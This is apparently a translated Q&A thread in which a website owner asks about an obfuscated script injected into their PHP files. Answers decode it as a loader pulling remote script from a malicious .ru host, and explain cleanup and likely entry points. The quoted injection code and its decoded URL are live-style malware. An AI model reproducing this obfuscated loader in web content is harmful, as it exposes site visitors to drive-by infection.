2010-02-06 59 views
1

我在我的網站的PHP文件中找到了以下代碼。我認爲有人只是能夠破解我的ftp或者用他能夠在我的PHP文件中添加這個腳本的方式,卻不知道如何。Iframe在PHP文件中的惡意代碼?

<script>/*Exception*/ document.write('<script src='+'h&)t()#[email protected]$^p^^(:&#/&/!)[email protected]&o&&[email protected]@)!o)[email protected]$e$!))k)^a)@!-$&&@r$u!!.)&u$!i(#m)#^s#()e$#$r#v$^(.!$#)n&e&)t).#p&&)@&i&@c)#h^(u$#[email protected]))$t)#[email protected]&!r(-!&&c^&o(^m)!)^&.)g($e^)n#^u&&^[email protected]#n([email protected]@!$)l!)#o&$([email protected])s)@&$.&^r(u()&:!)8([email protected]@!8$&&0!(^/&^!c!^o^!m!^&d&i)#!r$!()e$#c^([email protected]@[email protected]!d((#e&@/^&^c!!)!)o#((#m&$$d)^)$i&(&r!&e&$)[email protected](#t#$.(d^e(!#/&!^e)a!^()r&)t^@[email protected]@$i(&$n#$^$k(&.&n(#^e#t#/^@w$o^&[email protected]&$l&^d#o!&&#[email protected]()!w((a)(r$!c(!)r!)&#a^&f#$t(&$.#($c(^@[email protected]@m#&^/[email protected]&#o(^o^&(!&[email protected]#e^!&&.(c^o#[email protected]#$/(^##'.replace(/&|\(|\$|\)|\!|\^|@|#/ig, '')+' defer=defer></scr'+'ipt>');</script> 
<!--5f81e446ddf4e34599fb494b668c1569--> 

但我想知道以上代碼的意思,我想這在HTML格式或以其他形式進行了加密,但什麼上面的代碼實際上是在做和如何有人能在我的網站上把它注射??

謝謝。

回答

2

上述腳本SRC導致地址http://novoteka-ru.uimserv.net.pichunter-com.genuinecolors.ru:8080/comdirect.de/comdirect.de/earthlink.net/worldofwarcraft.com/google.com/

它鑽進你的文件或者通過在你的網站/腳本安全漏洞或直接通過FTP。

請務必儘快從這些惡意代碼清除您的文件,更改您的ftp密碼並修復您的安全漏洞!

+0

我可以輕而易舉地完成前兩件事,但是「解決您的安全缺陷」是什麼類型的錯誤,我看着我的代碼。這些代碼可以被注入的可能方式有哪些?因爲他們如何能夠直接從我的網站寫入我的文件? – Prashant 2010-02-06 21:39:00

+1

@Prashant這聽起來像你基本上需要閱讀網絡安全。有人可能攻擊你的服務器和更改文件的方式非常多。它可能是通過你的PHP代碼,它可能是通過你的網絡服務器(或郵件服務器等)的利用,它甚至可以通過你的開發系統上的間諜軟件獲得你的密碼。你正在運行你自己的服務器,還是你在託管/共享託管?你是否在使用類似Wordpress或Web框架的東西?您是否使用FTP(以明文形式發送密碼)或sftp? – JAL 2010-02-06 21:47:20

+2

如果您運行任何應用程序(如論壇或圖庫),請嘗試升級到最新版本。這些應用程序通常具有安全漏洞,因爲這些源是公開可用的,所以很容易找到並利用它們。 – Alex 2010-02-06 21:48:17

0

我不認爲它做任何事情。它具有相同的URL Alex posted,所以我不打算在此重複。

當我試圖用curl與IE6的用戶代理頭獲取它,記錄頭到一個文件,我得到了這些標題:

HTTP/1.1 200 OK 
Server: nginx 
Date: Sat, 06 Feb 2010 21:37:13 GMT 
Content-Type: text/javascript 
Connection: close 
X-Powered-By: PHP/5.1.6 
Expires: 0 
Pragma: no-cache 
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 
Cache-Control: private 
Content-Length: 2 

此外,該文件的內容似乎只是一個CRLF 。沒什麼特別的。

我不知道他們爲什麼把它放在那裏,但也許曾經有過惡意的東西,但現在沒有......或者他們只是在等待一些時間來放置一些惡意代碼。